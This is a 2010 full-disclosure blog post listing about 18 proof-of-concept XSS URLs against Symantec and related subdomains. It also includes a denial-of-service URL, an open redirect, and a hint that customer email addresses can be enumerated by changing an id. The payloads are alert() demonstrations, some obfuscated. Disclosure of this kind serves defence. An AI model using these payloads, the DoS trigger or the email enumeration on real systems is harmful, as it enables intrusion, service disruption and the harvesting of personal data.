Full Disclosure about 20 XSS bugs on Symantec.com and related domains

2010/09/03

Martin Hall

http://www.thetestmanager.com/blog/2010/09/03/full-disclosure-about-20-xss-bugs-on-symantec-com-and-related-domains/



I have written a new tool called SubFinder (provisional name subject to change).

It does exactly as the name suggests. It will find Subdomains on any given host. It will do this via a few methods, first it will look in a couple of obvious places and then it will bruteforce the rest.

It will be released in the next couple of days.

I wanted to test it so I ran it against Symantec.com

I got over 200 subdomains found. (not all could be browsed, but loads were)

From the domain list I thought i would check some of them over for XSS issues. The reason that you will find more issues is because firstly these sub domains are usually used to host mini sites, or sub sites. When/If there is a code review then these can be missed.

Also SubDomains are more often than not coded by outsourced suppliers so even if Symantec had great processes in place (which they don’t) , there is a chance that the outsourced suppliers do not.

(1) symantecenterprise XSS

(2) Symantec Connect Search Feature XSS (May only work in IE?)

(3) https://et.symantec.com XSS

(4) http://maillist.entsupport.symantec.com XSS

(5) Bit of a strnge one this, if you go to https://renewalcenter.symantec.com/
and into the email box type
“><</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>
you should get an error which states invalid email address entered.
Now change the URL to
https://renewalcenter.symantec.com
and Bingo XSS (is it being stored? making it a sotred XSS
I don’t think so but not 100% sure)

(6) http://www.symantec.com/ XSS (IE browsers only?)

(7) open redirect to XSS – http://www.messagelabs.co.uk/ XSS -
Seems to only work in Firefox?, and not in IE?

(8) http://www.symantec.com/ Connect Forward XSS
IE only?

(9) https://symantecevents XSS
Site development on the above seems to have outsourced to
http://verite.com/our-work/by-client/client-focus/?client_id=2
I’m guessing all of their sites for symantec would be easy targets.

(10) http://seer.entsupport.symantec.com/ XSS

(11) http://aka-community.symantec.com

(12) https://careers.symantec.com/ XSS (may need to visit page twice as the
first time sets the cookie)

(13) https://chat.symantec.com XSS

(15) https://www4.symantec.com/ XSS

(16) http://seer.entsupport.symantec.com/ Navbar XSS

(17) Ouch Denial Of Service (DOS) via Bad Param Injection =
http://techcenter.symantec.com redirect to http://techcenter.symantec.com/ecampus/enterprise =
which works fine as do all other URLs on this techcenter subdomain.
However if I now use the url =
http://techcenter.symantec.com/ecampus/enterprise?cat=null&cmd=sc&courseNo=DP6000&EXValue=null&file=null&module&page=null&siteName=sena&type=g_
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.

(18) http://cybercrimenews.norton.com XSS

(19) Every Symantec customer email address can be grabbed = http://bit.ly/91fZrT just change the id. you could start at 1 and work your way up. This is very easy to automate. looks like over 16 million potential email addresses?.

(1)

https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&LASTNAME=qqqq&COMPANY=qqqq&JOBTITLE=Vice+President&ADDRESS1=qqqq&ADDRESS2=qqqq&CITY=qqqq&STATEPROVINCE=AK&COUNTRY=United+States+of

+America&POSTALCODE=90210&PHONENUMBER=999&EMAIL=qqqq%40aaa&COMPANYSIZE=1+to+10&QUESTION=0659ttm</textarea> <br /><script>alert(‘The TestManager SymanTec Xss SubFinder

Test’)</script>&button=Submit&_RequiredFields_=FIRSTNAME%2CLASTNAME%2CCOMPANY%2CJOBTITLE%2CADDRESS1%2CCITY%2CSTATEPROVINCE%2CCOUNTRY%2CPOSTALCODE%2CPHONENUMBER%2CEMAIL%2CCOMPANYSIZE&_EMailFields_=EMAIL&_Real

Fields_=&_IntegerFields_=&_BannedFields_=TRUE&_ID_=symc.2114.-2&Campaign_=JK_Form_RequestSalesCall_MASTER&charset_=UTF-8&_InlineResponseRule_=true&_Sent_=2010-08-23+16%3A19%3A41.610&ACTIVITYCODE=92078&EMail_

=92078&__HIDDEN_FIELD_NAMES__=_RequiredFields_%3B_EMailFields_%3B_RealFields_%3B_IntegerFields_%3B_BannedFields_%3B_ID_%3BCampaign_%3Bcharset_%3B_InlineResponseRule_%3B_Sent_%3BACTIVITYCODE%3BEMail_%3B__HIDD

EN_FIELD_NAMES__

(2)

http://www.symantec.com/connect/search?filters=01a1ttm–”);</script><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,

117,98,70,105,110,100,101,114,32,84,101,115,116))</script>

(3) https://et.symantec.com/signup/thanks.html?fn=ttm</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>&em=aaaa@aaa.c

(4) http://maillist.entsupport.symantec.com/subscribe.asp?ddProduct=18d4ttm–”></form><script>alert(‘The Test Manager.com Sub Finder Symantec Test’)</script>&EmailAddress=&password=

(5) Bit of a strnge one this, if you go to https://renewalcenter.symantec.com/storefront/app/storefront.jsp?action=transferReloadCheckAccount&_requestid=99999
and into the email box type
“><</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>
you should get an error which states invalid email address entered.
Now change the URL to

https://renewalcenter.symantec.com/storefront/app//storefront.jsp?action=transferReloadLogin&success=yes&_requestid=99999

and Bingo XSS (is it being stored? making it a sotred XSS – I don’t think so but not 100% sure)

(6) http://www.symantec.com/business/support/knowledge_base_results.jsp?SearchTerm=ttm”/><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>&ddProduct=&pid=&content=all

(7) open redirect to XSS – http://www.messagelabs.co.uk/resources/blog.aspx?link=javascript:alert(‘The Test Manager Sub Finder Symantec XSS Test’) – Seems to only work in Firefox? , and not in IE?

(8) http://www.symantec.com/connect/forward?path=2e6fttm–”);</script><script>alert(‘The Test Manager XSS Test for Sub FInder’)</script>

(9)

https://symantecevents.verite.com/?action=main.dsp_register&error=42f2ttm–</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,1

15,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>
Site development on the above seems to have outsourced to http://verite.com/our-work/by-client/client-focus/?client_id=2& – I’m guessing all of their sites for symantec would be easy targets.

(10)

http://seer.entsupport.symantec.com/email_forms/sendmail.asp?ddProduct=&SrvURL=&type=10&strName=a&strEmail=ttm–%3C/p%3E%3Cscript%3Ealert%28%22TheTestManager%20Sub%20Finder%20Symantec%20test%22%29%3C/script%

3E&topic=symantec&strBODY=aaa&submit2=Send

(11)

https://symantecevents.verite.com/?action=event.dsp_cancel&event_id=17895&error=ttm–</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,

99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>test

(12) http://aka-community.symantec.com/lib/jsp/socialbookmarkingjs.jsp?lg=en&ct=us&segment=ttm–”);</script><script>alert(‘The Test Manager Xss Test using Sub Finder on Symantec’)</script>

(13) https://careers.symantec.com/psc/jobs/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?4210ttm–”;</script><script>alert(‘the test manager xss test of sub finder on Symantec’)</script>test& (may need to visit page

twice as the first time sets the cookie)

(14) https://chat.symantec.com/sdcxuser/lachat/user/reentry.asp?email=05edttm–”><script>alert(‘XSS TEST’)</script>&lg=en&noqcode=

(15) https://www4.symantec.com/Vrt/vrtcontroller?EMAIL=0d07ttm–”><script>alert(‘The Test Manager Subfinder Xss

Symantec’)</script>&PASSWD=a&CONFIRM_PASSWD=a&a_id=48182&s_id=70&p_id=null&COMMAND_DESTINATION_URL=null&REDIRECT_PAGE=null&p_locale=en_US&l_id=&article_title=Results&t_id=62243672&t_s=1283128779469&EMAIL_AS_

USER_FLAG=Y&FRM_ACTION=Create+Account&ru=null

(16) http://seer.entsupport.symantec.com/nav_bar/side_nav.asp?ddProduct=ttm%22%3E%3Cscript%3Ealert%28%27The%20Test%20Manager%20Sub%20Finder%20Xss%20symantec%20Test%27%29%3C/script%3E

(17) Ouch DOS via Bad Param Injection = http://techcenter.symantec.com redirect to http://techcenter.symantec.com/ecampus/enterprise = which works fine as do all other URLs on this techcenter subdomain.
However if I now use the url = http://techcenter.symantec.com/ecampus/enterprise?cat=null&cmd=sc&courseNo=DP6000&EXValue=null&file=null&module&page=null&siteName=sena&type=g_
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.

(18) http://cybercrimenews.norton.com/cgi-bin/search.cgi?target=1f10ttm–”><script>alert(‘The Test Manager XSS Sub Finder Tool Test’)</script>&rule=any&page=2


main page ATTRITION feedback